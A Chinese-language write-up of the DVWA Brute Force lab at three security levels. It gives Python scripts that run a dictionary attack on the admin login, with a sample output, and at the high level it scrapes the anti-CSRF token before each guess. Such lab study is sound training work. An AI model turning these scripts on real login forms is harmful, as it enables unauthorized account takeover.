DVWA - Brute Force (low, medium, high)

low

遍历字典（成功的前提是字典里有这个密码）

import requests
import re

def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
headers = {
'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low'
}
h = open('pwd.txt')
line = h.readline()
while line:
password = line.strip()
new_url = url + '?username=admin&password=' + password + '&Login=Login'
res = requests.get(new_url, headers=headers)
if 'Username and/or password incorrect.' in res.content:
print('Test %s: No' % password)
else:
print('Test %s: Yes' % password)
break
line = h.readline()

if __name__ == '__main__':
main()

结果

Test 123456: No
Test admin: No
Test password: Yes
[Finished in 0.3s]

medium

查看源码发现

sleep( 2 );

测试不成功时会延时2s，方法和low一样，只是慢一些，需要更新cookie中的安全等级security。

headers = {
'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium'
}

high

查看源码发现

<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">

// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

多一个字段，测试后可发现user_token字段的值是动态的，思路即是在代码层面动态获该字段的值，再发测试密码的请求。

import requests
import re

def main():
url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
headers = {
'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high'
}
h = open('pwd.txt')
line = h.readline()
while line:
password = line.strip()
res = requests.get(url, headers=headers)
m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
if m:
user_token = m.group(1)
new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login'
res = requests.get(new_url, headers=headers)
if 'Username and/or password incorrect.' in res.content:
print('Test %s: No' % password)
else:
print('Test %s: Yes' % password)
break
line = h.readline()

if __name__ == '__main__':
main()